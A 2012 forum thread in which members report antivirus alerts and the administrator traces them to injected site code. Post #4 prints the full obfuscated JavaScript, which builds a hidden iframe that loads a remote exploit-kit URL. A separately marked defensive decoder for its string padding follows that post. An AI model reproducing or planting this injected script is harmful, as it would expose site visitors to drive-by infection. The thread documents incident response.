
Malicious URL blocked


    Malicious URL blocked

    I keep getting Avast messages accessing CUK.

    URL: http:// gostatics . com/default.cgi

    Process: file://C:\Program Files\Mozilla Firefox\...

    Infection: url:Mal

    Anybody else seeing this?
    Last edited by administrator; 1 March 2012, 12:48. Reason: remove link
    Me, me, me...

    #2
    Originally posted by Cliphead View Post
    I keep getting Avast messages accessing CUK.

    URL: http:// gostatics . com/default.cgi

    Process: file://C:\Program Files\Mozilla Firefox\...

    Infection: url:Mal

    Anybody else seeing this?

    You must be in Professional. The Mal virus or Malvolio virus is an aggressive type of infection. Very single minded, with only one form of attack and a massive chip on its shoulder. Have you tried NL Anti Virus?
    Last edited by administrator; 1 March 2012, 12:48. Reason: remove url
    What happens in General, stays in General.
    You know what they say about assumptions!

    Comment


      #3
      Oddly enough I got an intrusion blocked by ukinoxi.in when I logged on this morning

      Norton says IP Alert Name was Web Attack: Malicious Exploit Kit Website 4
      'CUK forum personality of 2011 - Winner - Yes really!!!!

      Comment


        #4
        Sorry guys, just noticed this one and had a look. I have found the source of the infection and it was a different one to the last time. I saw another hack on a different forum a week or so ago, different to the one we had from a few weeks ago and also different to this one. The forum is up to date in terms of the latest patch level and we only run the one plug in and that is up to date as well. Will send ticket to vBulletin support in a sec as this is getting silly now.

        This looks to be the source of the infection:

        Code:
        (function(){function bZq6wnH(){if(document.body){if(window.name!='jPPj0x'&&!window.tUN3fz){function gDHtJca(rzhDNW){if(rzhDNW.contentDocument)return rzhDNW.contentDocument; if(rzhDNW.contentWindow)return rzhDNW.contentWindow.document;return rzhDNW.document}var fe3k2f6r = {};with(fe3k2f6r){hOAoRrA=/a/.__proto__=='//';zENwnH5='\v'=='v'}var ziJ9xE='z9KRA5';var c0u8Z63='5567eb98';var fWZIQNA1='z9KRA5hz9KRA5tz9KRA5tz9KRA5pz9KRA5:z9KRA5/z9KRA5/z9KRA5nz9KRA5ez9KRA5tz9KRA5sz9KRA5tz9KRA5az9KRA5tz9KRA5iz9KRA5cz9KRA5.z9KRA5iz9KRA5nz9KRA5fz9KRA5oz9KRA5/z9KRA5iz9KRA5nz9KRA5.z9KRA5cz9KRA5gz9KRA5iz9KRA5?z9KRA53z9KRA5';var cxhqp5='z9KRA5iz9KRA5fz9KRA5rz9KRA5az9KRA5mz9KRA5ez9KRA5';var vQUxwE=fe3k2f6r.zENwnH5?'<'+cxhqp5.split(ziJ9xE).join('')+' name="'+c0u8Z63+'" src="'+fWZIQNA1.split(ziJ9xE).join('')+'">':cxhqp5.split(ziJ9xE).join('');var pYrOhQ=document.createElement(vQUxwE);with(pYrOhQ){name=c0u8Z63;setAttribute('name',c0u8Z63);id=c0u8Z63}document.body.appendChild(pYrOhQ);if(window.name==='')window.name='jPPj0x';window.tUN3fz=true;with(pYrOhQ.style){if(!fe3k2f6r.hOAoRrA)position='absolute';left=top='0px';height=width='1px';visibility='hidden'}if(!fe3k2f6r.zENwnH5)gDHtJca(pYrOhQ).location.replace(fWZIQNA1.split(ziJ9xE).join(''))}}else setTimeout(bZq6wnH,0)}bZq6wnH()})();
        Prize for anyone who can decode this, some v clever code by the looks of it.

        If you are still getting the infection attempt from Avast then PM me but have not seen the infection message since cleaning this file out.

        As before, use Malware Bytes and make sure you haven't been infected. If your browsers and OS are up to date then you should be OK as I guess the code will look for flaws in these to exploit and install Trojans if possible.

        If you ever get reports like this then please PM me as I will be able to react much quicker as I sometimes don't come here until later in the day.

        Comment
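Added example, not part of the original thread: a static decoder for the string-padding trick visible in the script quoted in post #4, where each literal has a separator token inserted between its characters and is rebuilt at run time with `split(...).join('')`. It reads the literals as text and never runs the sample; the input is constructed with a placeholder host, and all function names are illustrative.

```javascript
// Static decoder for separator-padded string literals; the sample is only read as text.
// Helper used only to build the constructed sample below.
const pad = (s, k) => k + s.split("").join(k);
const K = "Zq9"; // constructed separator token

// Constructed input in the same style as the quoted script (placeholder host).
const SAMPLE = [
  `var k='${K}';`,
  `var u='${pad("http://files.example.invalid/in.cgi", K)}';`,
  `var t='${pad("iframe", K)}${K}';`,
  "var el=document.createElement(t.split(k).join(''));",
  "el.src=u.split(k).join('');",
].join("\n");

// Collect simple  var name='literal'  assignments.
function extractLiterals(src) {
  const lits = new Map();
  const re = /var\s+([A-Za-z_$][\w$]*)\s*=\s*'([^'\\]*)'/g;
  for (const m of src.matchAll(re)) lits.set(m[1], m[2]);
  return lits;
}

// Separators are the literals whose variable is passed to .split(name).
function decodePadded(src) {
  const lits = extractLiterals(src);
  const seps = new Set();
  for (const m of src.matchAll(/\.split\(\s*([A-Za-z_$][\w$]*)\s*\)/g)) {
    if (lits.has(m[1])) seps.add(lits.get(m[1]));
  }
  return [...lits].flatMap(([name, value]) => [...seps]
    .filter((sep) => sep && value !== sep && value.includes(sep))
    .map((sep) => ({ name, decoded: value.split(sep).join("") })));
}

// Defang URLs so the report cannot be clicked or auto-linked.
const defang = (s) => s.replace(/^http/i, "hxxp").replace(/\./g, "[.]");

function summarize(src) {
  return decodePadded(src).map(({ name, decoded }) => {
    const isUrl = /^https?:\/\//i.test(decoded);
    return { name, kind: isUrl ? "url" : "string", value: isUrl ? defang(decoded) : decoded };
  });
}

console.log(summarize(SAMPLE));
```

The decoded element name and address are what to search for in server-side templates and plugin files when hunting the injected block, and the address is what to add to proxy or DNS blocklists.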


          #5
          Originally posted by Cliphead View Post
          I keep getting Avast messages accessing CUK.

          URL: http:// gostatics . com/default.cgi

          Process: file://C:\Program Files\Mozilla Firefox\...

          Infection: url:Mal

          Anybody else seeing this?
          Yep, keeps popping up this morning.
          "Ask not what you can do for your country. Ask what's for lunch." - Orson Welles

          Norrahe's blog

          Comment


            #6
            Hasn't popped up for a while now so looks like it's sorted.
            Me, me, me...

            Comment


              #7
              Originally posted by Cliphead View Post
              Hasn't popped up for a while now so looks like it's sorted.
              Same here, hopefully.

              Irish jelly and ice cream avatar???

              "Ask not what you can do for your country. Ask what's for lunch." - Orson Welles

              Norrahe's blog

              Comment


                #8
                That's it, this is getting scary. I am off CUK for a while till all this virus infection stuff is fixed. Can't take the risk anymore.

                Vote Corbyn ! Save this country !

                Comment


                  #9
                  Originally posted by norrahe View Post
                  Same here, hopefully.

                  Irish jelly and ice cream avatar???

                  Party food as Rangers die...........

                  Me, me, me...

                  Comment


                    #10
                    Originally posted by fullyautomatix View Post
                    That's it, this is getting scary. I am off CUK for a while till all this virus infection stuff is fixed. Can't take the risk anymore.

                    I have managed to decode it and found it drops a package on people's machines but it only executes when it spots a flounce... oh dear....
                    'CUK forum personality of 2011 - Winner - Yes really!!!!

                    Comment
